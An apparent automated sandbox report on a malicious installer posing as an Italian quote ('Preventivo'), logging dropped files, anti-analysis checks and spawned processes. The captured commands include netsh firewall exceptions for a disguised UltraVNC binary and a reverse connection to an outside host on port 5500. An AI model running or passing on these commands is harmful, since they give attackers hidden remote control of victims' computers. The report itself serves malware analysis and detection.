Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Games\viewer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Games\viewer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Games\viewer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Games\taskhost.exe

Code function: 41_2_000C57B0 GetPrivateProfileStringA,WTSGetActiveConsoleSessionId,KiUserCallbackDispatcher,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,Process32Next,ProcessIdToSessionId,Process32Next,CloseHandle,CloseHandle,

Source: C:\Windows\System32\conhost.exe

Window / User API: threadDelayed 402

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\vnchooks.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6FFC.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi6E82.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll	Jump to dropped file

Source: C:\Games\taskhost.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Games\viewer.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Games\taskhost.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Games\viewer.exe

API coverage: 5.2 %

Source: C:\Windows\SysWOW64\timeout.exe TID: 8544	Thread sleep count: 169 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8964	Thread sleep count: 169 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 9112	Thread sleep count: 171 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8212	Thread sleep count: 168 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8260	Thread sleep count: 166 > 30

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FE9080 FindFirstFileW,FindClose,CloseHandle,CloseHandle,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EA5220 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,PathIsUNCW,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FBD700 FindFirstFileW,GetLastError,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_01008B30 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FBCDD0 FindFirstFileW,FindFirstFileW,FindClose,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FE3210 FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00F9F570 FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FF3790 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FF3C10 FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FCBFF0 FindFirstFileW,FindClose,FindClose,
Source: C:\Games\taskhost.exe	Code function: 41_2_000BEC90 GetDlgItem,GetModuleFileNameA,_strrchr,FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose,

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00FF2400 GetLogicalDriveStringsW,GetDriveTypeW,Wow64DisableWow64FsRedirection,Wow64RevertWow64FsRedirection,

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_01087833 VirtualQuery,GetSystemInfo,

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\c.cmd
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmmc.cmd
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmd.txt
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\

Source: viewer.exe, 0000002A.00000002.1871973925.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+
Source: Preventivo24.01.11.exe, 00000000.00000003.1697655494.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.1700664363.00000000009A3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWCZ
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	Binary or memory string: , (Hyper-V Tools)
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	Binary or memory string: , (Hyper-V Server)
Source: Preventivo24.01.11.exe, Preventivo24.01.11.exe, 00000000.00000002.1700517838.0000000000977000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1697655494.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1699048395.0000000000977000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.1700664363.00000000009B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	Binary or memory string: Service Pack: 6aService Pack: 1aService Pack:%d.%dService Pack:%dService Pack:0.%d, (Storage Server Enterprise), (Storage Server Express), (Storage Server Standard), (Storage Server Workgroup), (Storage Server Essentials), (Storage Server), (Home Server Premium Edition), (Home Server Edition), (Terminal Services), (Embedded), (Terminal Services in Remote Admin Mode), (64 Bit Edition), (Media Center Edition), (Tablet PC Edition), (Compute Cluster Edition), (Foundation Edition), (MultiPoint Premium Edition), (MultiPoint Edition), (Security Appliance), (BackOffice), (N Edition), (E Edition), (Hyper-V Tools), (Hyper-V Server), (Server Core), (Uniprocessor Free), (Uniprocessor Checked), (Multiprocessor Free), (Multiprocessor Checked), (Windows Essential Business Server Manangement Server), (Windows Essential Business Server Messaging Server), (Windows Essential Business Server Security Server), (Cluster Server), (Small Business Server), (Small Business Server Premium), (Prerelease), (Evaluation), (Automotive), (China), (Single Language), (Win32s), (Education), (Industry), (Student), (Mobile), (IoT Core), (Cloud Host Infrastructure Server), (S Edition), (Cloud Storage Server), (PPI Pro), (Connected Car), (Handheld)Failed in call to GetOSVersion
Source: taskhost.exe, 00000029.00000002.3496512970.000000000114E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\wbem\WMIC.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_0108F843 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00FF6910 CreateFileW,GetLastError,OutputDebugStringW,OutputDebugStringW,SetFilePointer,OutputDebugStringW,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,

Source: C:\Games\taskhost.exe

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00FC0CA0 LoadLibraryW,GetProcAddress,FreeLibrary,

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_0108A1CE mov esi, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_010A4796 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_010A47DA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_01095EA4 mov ecx, dword ptr fs:[00000030h]
Source: C:\Games\viewer.exe	Code function: 6_2_0064B9CA mov eax, dword ptr fs:[00000030h]
Source: C:\Games\viewer.exe	Code function: 6_2_00643C84 mov eax, dword ptr fs:[00000030h]
Source: C:\Games\taskhost.exe	Code function: 41_2_001DC838 mov eax, dword ptr fs:[00000030h]
Source: C:\Games\taskhost.exe	Code function: 41_2_001CD615 mov ecx, dword ptr fs:[00000030h]
Source: C:\Games\taskhost.exe	Code function: 41_2_001DC7F4 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_0108A23A GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EC2520 __set_se_translator,SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_0108ACAE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EC5180 __set_se_translator,SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_0108F843 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Games\viewer.exe	Code function: 6_2_00635248 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Games\viewer.exe	Code function: 6_2_00639256 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Games\viewer.exe	Code function: 6_2_006353DE SetUnhandledExceptionFilter,
Source: C:\Games\viewer.exe	Code function: 6_2_006347F5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Games\taskhost.exe	Code function: 41_2_001BC87C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Games\taskhost.exe	Code function: 41_2_001B8A67 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

Source: C:\Games\viewer.exe

Code function: 6_2_00615210 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,GetModuleHandleW,GetProcAddress,CloseHandle,Sleep,Sleep,EnumWindows,BringWindowToTop,

Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5383948 -connect vnvariant2024.ddnsfree.com:5500 -run
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Process created: C:\Windows\SysWOW64\msiexec.exe c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\photo and fax vn\photo and vn 1.1.2\install\f97891c\main1.msi" ai_setupexepath=c:\users\user\desktop\preventivo24.01.11.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1706008514 " ai_euimsi="
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Process created: C:\Windows\SysWOW64\msiexec.exe c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\photo and fax vn\photo and vn 1.1.2\install\f97891c\main1.msi" ai_setupexepath=c:\users\user\desktop\preventivo24.01.11.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1706008514 " ai_euimsi="

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00FB9280 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,FindCloseChangeNotification,

Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	Binary or memory string: Program Manager
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	Binary or memory string: Shell_TrayWnd
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	Binary or memory string: Progman
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	Binary or memory string: UltraVNC.ini -settingshelperShell_TrayWnd%dpasswdUltraVNCpasswd2isWritablePermissions{34F673E0-878F-11D5-B98A-00B0D07B8C7C}
Source: taskhost.exe.0.dr	Binary or memory string: Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32BlockInputtimerscreenupdatemouseupdateuser1user2quitplaceholder1placeholder2restartvncDesktop::~vncDesktop : ~vncDesktop

Source: C:\Games\viewer.exe

Code function: 6_2_00635448 cpuid

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Games\viewer.exe	Code function: GetLocaleInfoW,
Source: C:\Games\viewer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Games\viewer.exe	Code function: GetLocaleInfoW,
Source: C:\Games\viewer.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Games\viewer.exe	Code function: GetLocaleInfoEx,___wcsnicmp_ascii,
Source: C:\Games\viewer.exe	Code function: GetLocaleInfoW,
Source: C:\Games\viewer.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoW,
Source: C:\Games\viewer.exe	Code function: EnumSystemLocalesW,
Source: C:\Games\viewer.exe	Code function: EnumSystemLocalesW,
Source: C:\Games\viewer.exe	Code function: EnumSystemLocalesW,
Source: C:\Games\viewer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Games\viewer.exe	Code function: EnumSystemLocalesW,

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Games\taskhost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Games\taskhost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_01003AD0 CreateNamedPipeW,CreateFileW,

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00FF6820 GetLocalTime,

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

